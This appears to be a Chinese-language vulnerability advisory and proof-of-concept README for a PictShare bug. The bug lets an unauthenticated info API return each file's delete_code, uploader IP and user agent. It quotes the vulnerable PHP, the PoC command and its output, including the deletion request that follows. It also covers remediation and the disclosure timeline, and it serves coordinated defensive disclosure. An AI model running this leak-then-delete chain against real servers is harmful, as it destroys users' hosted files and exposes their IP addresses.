PictShare < 3.7.1 中通过 info API 泄露敏感信息(CWE-522)。PoC + 咨询报告。
info API 泄露敏感信息经授权的安全研究。PoC 仅供防御和教育用途。
PictShare 的 /api/info/<hash> 端点会返回任意已上传文件的完整原始元数据对象——包括授权删除操作的密钥 delete_code,以及上传者的 IP、User-Agent、远程端口和 SHA-1。未认证的攻击者只要知道某个文件(公开可见)的哈希值,就能读取其 delete_code,进而永久删除任意托管文件。
| CVE | CVE-2026-104051 |
| 产品 | PictShare(自托管图片/媒体托管服务) |
| 受影响版本 | >= 2.0.0, < 3.7.1 |
| 修复版本 | v3.7.1 |
| 漏洞类型 | 凭证保护不足(CWE-522)→ 任意文件删除 + 隐私泄露 |
| 所需权限 | 无(未认证) |
| CVSS 3.1 | 8.2 HIGH — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H |
| CVSS 4.0 | 8.8 HIGH — AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:H |
| 发现者 | Alisher Qarshibayev |
| 安全公告 | VulnCheck |
API::info() 查找哈希值并原样返回 getMetadataOfHash()——没有字段白名单:
// src/inc/api.class.php (< 3.7.1)
public function info()
{
$hash = $this->url[1] ?? '';
if (!$hash) return ['status' => 'err', 'reason' => 'Missing hash'];
if (!isExistingHash($hash)) return ['status' => 'err', 'reason' => 'Hash not found'];
return getMetadataOfHash($hash); // <-- raw meta.json, includes delete_code, ip, useragent
}
而 checkPermissions()——info 路由之前的唯一关卡——检查的是文件系统可写性,而非身份,因此 info 可在未认证的情况下访问:
public function checkPermissions()
{
if (!isFolderWritable(getDataDir())) throw new Exception('Data directory not writable');
else if (!isFolderWritable(ROOT.DS.'tmp')) throw new Exception('Temp directory not writable');
}
返回的元数据包含 delete_code,而删除 API 将其作为唯一的授权密钥接受:
// src/inc/api.class.php delete()
$correctCode = getDeleteCodeOfHash($hash);
if ($correctCode !== $code && $masterCode !== $code)
return ['status' => 'err', 'reason' => 'Invalid delete code'];
deleteHash($hash);
文件哈希是公开的(它们出现在每个共享图片 URL 中),因此整条攻击链——通过 info 泄露代码,再通过 delete 删除——只需要用户已经分享过的 URL。
python3 poc.py --url https://pics.example.com --hash <public_file_hash>
# add --delete to actually exercise the deletion (destructive) step
预期结果:
[*] GET /api/info/<hash>
[+] Leaked metadata via info API:
delete_code : 7f3a9c1e... <-- SECRET, should never be exposed
ip : 203.0.113.44 <-- uploader privacy leak
useragent : Mozilla/5.0 ...
remote_port : 51544
sha1 : da39a3ee...
[+] CVE-2026-104051 confirmed: delete_code exposed to unauthenticated caller
[i] With --delete: GET /api/delete/<leaked_code>/<hash> -> {"status":"ok"}
参见 poc.py。删除操作是选择性启用的(--delete),因此默认运行是只读且非破坏性的。
升级到 PictShare 3.7.1(修复提交 ce5fc47)。
info() 现在返回严格的白名单(mime、size、hash、sha1、uploaded),不再泄露 delete_code、ip、useragent 或 remote_port。一般性建议:API 响应必须显式白名单化字段;切勿序列化混合了机密数据与公开数据的内部记录。
相关:CVE-2026-104356——即使没有此泄露,
delete_code也是可预测的,因为它使用rand()生成。
| 日期 | 事件 |
|---|---|
| 2026-10-01 | 公开披露,CVE 预留并发布(VulnCheck),已在 v3.7.1 中修复 |
已负责任地向厂商披露,并通过 VulnCheck 协调。在此 PoC 发布之前已修复。出于防御和教育目的发布。